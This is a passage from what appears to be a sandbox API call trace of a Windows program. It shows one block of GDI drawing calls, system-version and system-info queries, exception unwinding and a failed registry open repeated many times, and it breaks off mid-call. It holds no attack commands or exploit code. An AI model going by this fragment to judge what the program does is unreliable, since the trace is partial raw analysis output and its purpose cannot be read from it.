wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.243] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.243] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.243] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.243] BeginPath (hdc=0x0) returned 0 [0088.243] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.243] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.243] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.243] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.243] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.243] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.243] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.243] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.243] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4f0401d6 [0088.243] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x510401d3 [0088.243] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410e0 [0088.243] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410e1 [0088.243] CombineRgn (hrgnDst=0x10410e0, hrgnSrc1=0x4f0401d6, hrgnSrc2=0x510401d3, iMode=1) returned 1 [0088.243] CombineRgn (hrgnDst=0x10410e1, hrgnSrc1=0x4f0401d6, hrgnSrc2=0x510401d3, iMode=4) returned 2 [0088.243] CreateSolidBrush (color=0xff) returned 0x21010df [0088.243] CreateSolidBrush (color=0xff0000) returned 0x11010e2 [0088.243] DeleteObject (ho=0x11010e2) returned 1 [0088.243] DeleteObject (ho=0x510401d3) returned 1 [0088.243] DeleteObject (ho=0x4f0401d6) returned 1 [0088.243] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.243] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.243] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.243] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.243] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.243] BeginPath (hdc=0x0) returned 0 [0088.243] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.243] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.243] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.244] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.244] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.244] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.244] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.244] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.244] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x520401d3 [0088.244] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x500401d6 [0088.244] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410e3 [0088.244] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410e4 [0088.244] CombineRgn (hrgnDst=0x10410e3, hrgnSrc1=0x520401d3, hrgnSrc2=0x500401d6, iMode=1) returned 1 [0088.244] CombineRgn (hrgnDst=0x10410e4, hrgnSrc1=0x520401d3, hrgnSrc2=0x500401d6, iMode=4) returned 2 [0088.244] CreateSolidBrush (color=0xff) returned 0x21010e2 [0088.244] CreateSolidBrush (color=0xff0000) returned 0x11010e5 [0088.244] DeleteObject (ho=0x11010e5) returned 1 [0088.244] DeleteObject (ho=0x500401d6) returned 1 [0088.244] DeleteObject (ho=0x520401d3) returned 1 [0088.244] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.244] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.244] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.244] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.244] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.244] BeginPath (hdc=0x0) returned 0 [0088.244] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.244] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.244] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.244] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.244] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.244] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.244] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.244] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.245] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x510401d6 [0088.245] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x530401d3 [0088.245] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410e6 [0088.245] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410e7 [0088.245] CombineRgn (hrgnDst=0x10410e6, hrgnSrc1=0x510401d6, hrgnSrc2=0x530401d3, iMode=1) returned 1 [0088.245] CombineRgn (hrgnDst=0x10410e7, hrgnSrc1=0x510401d6, hrgnSrc2=0x530401d3, iMode=4) returned 2 [0088.245] CreateSolidBrush (color=0xff) returned 0x21010e5 [0088.245] CreateSolidBrush (color=0xff0000) returned 0x11010e8 [0088.245] DeleteObject (ho=0x11010e8) returned 1 [0088.245] DeleteObject (ho=0x530401d3) returned 1 [0088.245] DeleteObject (ho=0x510401d6) returned 1 [0088.245] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.245] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.245] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.245] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.245] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.245] BeginPath (hdc=0x0) returned 0 [0088.245] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.245] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.245] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.245] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.245] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.245] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.245] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.245] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.245] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x540401d3 [0088.245] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x520401d6 [0088.245] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410e9 [0088.246] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410ea [0088.246] CombineRgn (hrgnDst=0x10410e9, hrgnSrc1=0x540401d3, hrgnSrc2=0x520401d6, iMode=1) returned 1 [0088.246] CombineRgn (hrgnDst=0x10410ea, hrgnSrc1=0x540401d3, hrgnSrc2=0x520401d6, iMode=4) returned 2 [0088.246] CreateSolidBrush (color=0xff) returned 0x21010e8 [0088.246] CreateSolidBrush (color=0xff0000) returned 0x11010eb [0088.246] DeleteObject (ho=0x11010eb) returned 1 [0088.246] DeleteObject (ho=0x520401d6) returned 1 [0088.246] DeleteObject (ho=0x540401d3) returned 1 [0088.246] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.246] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.246] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.246] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.246] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.246] BeginPath (hdc=0x0) returned 0 [0088.246] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.246] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.246] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.246] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.246] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.246] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.246] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.246] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.246] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x530401d6 [0088.246] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x550401d3 [0088.246] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410ec [0088.247] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410ed [0088.247] CombineRgn (hrgnDst=0x10410ec, hrgnSrc1=0x530401d6, hrgnSrc2=0x550401d3, iMode=1) returned 1 [0088.247] CombineRgn (hrgnDst=0x10410ed, hrgnSrc1=0x530401d6, hrgnSrc2=0x550401d3, iMode=4) returned 2 [0088.247] CreateSolidBrush (color=0xff) returned 0x21010eb [0088.247] CreateSolidBrush (color=0xff0000) returned 0x11010ee [0088.247] DeleteObject (ho=0x11010ee) returned 1 [0088.247] DeleteObject (ho=0x550401d3) returned 1 [0088.247] DeleteObject (ho=0x530401d6) returned 1 [0088.247] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.247] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.247] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.247] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.247] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.247] BeginPath (hdc=0x0) returned 0 [0088.247] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.247] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.247] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.247] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.247] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.247] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.247] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.247] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.247] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x560401d3 [0088.247] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x540401d6 [0088.247] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410ef [0088.247] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410f0 [0088.247] CombineRgn (hrgnDst=0x10410ef, hrgnSrc1=0x560401d3, hrgnSrc2=0x540401d6, iMode=1) returned 1 [0088.247] CombineRgn (hrgnDst=0x10410f0, hrgnSrc1=0x560401d3, hrgnSrc2=0x540401d6, iMode=4) returned 2 [0088.247] CreateSolidBrush (color=0xff) returned 0x21010ee [0088.247] CreateSolidBrush (color=0xff0000) returned 0x11010f1 [0088.247] DeleteObject (ho=0x11010f1) returned 1 [0088.247] DeleteObject (ho=0x540401d6) returned 1 [0088.247] DeleteObject (ho=0x560401d3) returned 1 [0088.248] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.248] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.248] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.248] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.248] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.248] BeginPath (hdc=0x0) returned 0 [0088.248] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.248] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.248] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.248] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.248] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.248] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.248] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.248] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.248] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x550401d6 [0088.248] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x570401d3 [0088.248] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410f2 [0088.248] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410f3 [0088.248] CombineRgn (hrgnDst=0x10410f2, hrgnSrc1=0x550401d6, hrgnSrc2=0x570401d3, iMode=1) returned 1 [0088.248] CombineRgn (hrgnDst=0x10410f3, hrgnSrc1=0x550401d6, hrgnSrc2=0x570401d3, iMode=4) returned 2 [0088.248] CreateSolidBrush (color=0xff) returned 0x21010f1 [0088.248] CreateSolidBrush (color=0xff0000) returned 0x11010f4 [0088.248] DeleteObject (ho=0x11010f4) returned 1 [0088.248] DeleteObject (ho=0x570401d3) returned 1 [0088.248] DeleteObject (ho=0x550401d6) returned 1 [0088.248] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.248] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.249] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.249] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.249] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.249] BeginPath (hdc=0x0) returned 0 [0088.249] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.249] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.249] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.249] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.249] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.249] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.249] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.249] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.249] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x580401d3 [0088.249] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x560401d6 [0088.249] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410f5 [0088.249] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410f6 [0088.249] CombineRgn (hrgnDst=0x10410f5, hrgnSrc1=0x580401d3, hrgnSrc2=0x560401d6, iMode=1) returned 1 [0088.249] CombineRgn (hrgnDst=0x10410f6, hrgnSrc1=0x580401d3, hrgnSrc2=0x560401d6, iMode=4) returned 2 [0088.249] CreateSolidBrush (color=0xff) returned 0x21010f4 [0088.249] CreateSolidBrush (color=0xff0000) returned 0x11010f7 [0088.249] DeleteObject (ho=0x11010f7) returned 1 [0088.249] DeleteObject (ho=0x560401d6) returned 1 [0088.249] DeleteObject (ho=0x580401d3) returned 1 [0088.249] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.249] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.249] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.249] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.249] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.249] BeginPath (hdc=0x0) returned 0 [0088.249] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.249] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.249] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.249] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.250] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.250] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.250] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.250] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.250] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x570401d6 [0088.250] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x590401d3 [0088.250] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410f8 [0088.250] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410f9 [0088.250] CombineRgn (hrgnDst=0x10410f8, hrgnSrc1=0x570401d6, hrgnSrc2=0x590401d3, iMode=1) returned 1 [0088.250] CombineRgn (hrgnDst=0x10410f9, hrgnSrc1=0x570401d6, hrgnSrc2=0x590401d3, iMode=4) returned 2 [0088.250] CreateSolidBrush (color=0xff) returned 0x21010f7 [0088.250] CreateSolidBrush (color=0xff0000) returned 0x11010fa [0088.250] DeleteObject (ho=0x11010fa) returned 1 [0088.250] DeleteObject (ho=0x590401d3) returned 1 [0088.250] DeleteObject (ho=0x570401d6) returned 1 [0088.250] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.250] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.250] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.250] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.250] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.250] BeginPath (hdc=0x0) returned 0 [0088.250] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.250] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.250] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.250] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.250] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.250] GetWindowRect (in: hWnd=0x0, 